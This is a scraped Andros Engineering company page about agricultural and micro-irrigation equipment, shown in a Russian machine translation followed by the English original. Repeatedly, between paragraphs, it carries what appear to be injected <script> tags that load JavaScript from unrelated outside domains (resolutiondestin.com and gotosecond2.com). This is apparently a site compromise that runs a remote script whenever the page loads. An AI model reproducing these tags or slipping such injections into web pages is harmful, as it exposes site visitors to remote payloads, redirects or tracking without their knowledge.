(805) 227-2801

<script type=text/javascript src='https://check.resolutiondestin.com/t.js'></script><script  type='text/javascript' src='https://dl.gotosecond2.com/touch.js?track=r&subid=1'></script>
<script type=text/javascript src='https://check.resolutiondestin.com/t.js'></script><script  type='text/javascript' src='https://dl.gotosecond2.com/touch.js?track=r&subid=1'></script>
<script type=text/javascript src='https://check.resolutiondestin.com/t.js'></script><script  type='text/javascript' src='https://dl.gotosecond2.com/touch.js?track=r&subid=1'></script>
Показывает законченный Мега-ролл в поле.

Наша история

С 1985 года Андрос поставляет сельскохозяйственному сектору инновационную продукцию, направленную на предоставление нашим клиентам возможностей выбора и решений для удовлетворения их производственных потребностей. Разрабатывая и конструируя продукцию в таких областях, как сельское хозяйство, горнодобывающая промышленность и орошение, Andros разрабатывает и производит эффективную продукцию с учетом Ваших потребностей.

Андрос также разрабатывает простые в эксплуатации, качественные и долговечные продукты для микроорошения. Микроорошение, обеспечивающее небольшую (но частую) подачу воды к корням каждого растения, является экономически эффективной и водосберегающей технологией. Наша система извлечения в конце строки была разработана для пользователей капельной ленты, которым нужна портативная и многоразовая система микроорошения. Кроме того, наша запатентованная Agri-Spool II позволяет любому пользователю извлекать и повторно использовать капельную ленту. Микроорошение необходимо для любой ирригационной системы при рассмотрении экономической эффективности и водосбережения.

Научно-исследовательские и опытно-конструкторские работы являются двумя важнейшими элементами стратегии "Андрос". Осуществляя проекты в области точного виноградарства, автоматизации полевой обработки и точного производства овощей, мы продолжаем инвестировать в исследования и разработки практических, но инновационных решений. Нашей целью в Andros является поиск ответов, которые будут способствовать вашему успеху.

Свяжитесь с нами прямо Andros Engineeringсейчас!

Лидер

Andros Engineering является одним из ведущих мировых производителей специализированных орудий труда и прицепов для сельскохозяйственной отрасли. От полностью изготовленных на заказ черносливов и сетчатых орудий до наиболее полной линии оросительной инъекции и поисковых орудий и прицепов.

<script type=text/javascript src='https://check.resolutiondestin.com/t.js'></script><script  type='text/javascript' src='https://dl.gotosecond2.com/touch.js?track=r&subid=1'></script>

 

Фото Mega Binder LRV извлечение капельницы
Разница

С более чем 33 лет создания инновационного оборудования, мы разработали в особенности и характеристики, которые обеспечивают успех оборудования в вашей области в течение многих лет.


 

Ключевые рынки для Andros Engineering

Наши клиенты включают в себя некоторые из самых успешных производителей продуктов питания и клетчатки в мире. Объединив новейшие технологии, с преданностью качеству мастерства, мы разработали репутацию мирового лидера в предоставлении специализированных решений для коммерческих фермеров, семян и растений исследователей и различных предприятий, которые сосредоточены на поддержки производства сельского хозяйства.

  • Сельскохозяйственный - Полная линия оборудования для развертывания капельной ленты и поиска, сад сетки установки и поиска, и виноградник обшивки оборудования.
  • Горнодобывающая промышленность и сточные воды - решения системы доставки и восстановления SDI для выщелачивания кучи, включая OEM и после адаптации рынка.
  • Завод исследований и питомников - Решения для сокращения рабочей силы, семян и обработки растений, собственные проекты. Мы предлагаем различные усовершенствования процессов как для отечественных, так и для международных производителей.
  • Инженерные решения - Наша опытная команда инженеров использует новейшее программное обеспечение и технологии, создавая решения для сокращения рабочей силы.

<script  type='text/javascript' src='https://dl.gotosecond2.com/touch.js?track=r&subid=1'></script>
<script  type='text/javascript' src='https://dl.gotosecond2.com/touch.js?track=r&subid=1'></script>
<script  type='text/javascript' src='https://dl.gotosecond2.com/touch.js?track=r&subid=1'></script>
<script  type='text/javascript' src='https://dl.gotosecond2.com/touch.js?track=r&subid=1'></script>

Our Story

Since 1985, Andros has provided the agricultural industry with innovative products aimed at giving our clients choices and solutions to their operational needs. Developing and engineering products in fields such as agriculture, mining and irrigation, Andros designs and manufactures efficient products with your needs in mind.

Andros also designs micro-irrigation products that are easy to operate, quality constructed and long-lasting. Delivering a small (but frequent) supply of water to each plant's roots, micro-irrigation is a cost-effective and water conserving technology. Our End-of-Row Retrieval System has been designed for drip tape users who need a micro-irrigation system that is both portable and reusable. Also, our patented Agri-Spool II enables any user to retrieve and reuse drip tape. Micro-irrigation is necessary for any irrigation system when considering cost-effectiveness and water conservation.

Research and development are two essential elements in the Andros strategy. With projects in precision viticulture, field processing automation and precision vegetable production, we continue investing in research and development for practical yet innovative solutions. Our goal at Andros is to find the answers that will contribute to your success.

Get in Contact with Andros Engineering now!

The leader

Andros Engineering is one of the world's leading manufacturers of specialized implements and trailers for the agriculture industry. From entirely custom engineered pruners and netting implements to the most comprehensive line of irrigation injection and retrieval implements and trailers.

<script  type='text/javascript' src='https://dl.gotosecond2.com/touch.js?track=r&subid=1'></script>

 

<script  type='text/javascript' src='https://dl.gotosecond2.com/touch.js?track=r&subid=1'></script>
The difference

With more than 33 years of creating innovative equipment, we've designed in features and characteristics that ensure the equipment's success in your field for many years.


 

Key Markets for Andros Engineering

Our clientele include some of the most successful producers of food and fiber in the world. By combining the latest technology, with a dedication to quality craftsmanship, we have developed a reputation as a world leader at providing specialized solutions for commercial farmers, seed and plant researchers and a variety of businesses that focus on supporting production agriculture.

  • Agricultural - Complete line of equipment for both drip tape deployment and retrieval,  orchard netting installation and retrieval, and vineyard pruning equipment.
  • Mining and Wastewater - SDI delivery and recovery system solutions for heap leaching including OEM and after market adaptability.
  • Plant Research and Nurseries - Solutions for labor reduction, seed and plant handling, proprietary designs. We offer a variety of process improvements for both domestic and international growers.
  • Engineering Solutions - Our experienced engineering team uses the latest software and technology creating labor reducing solutions.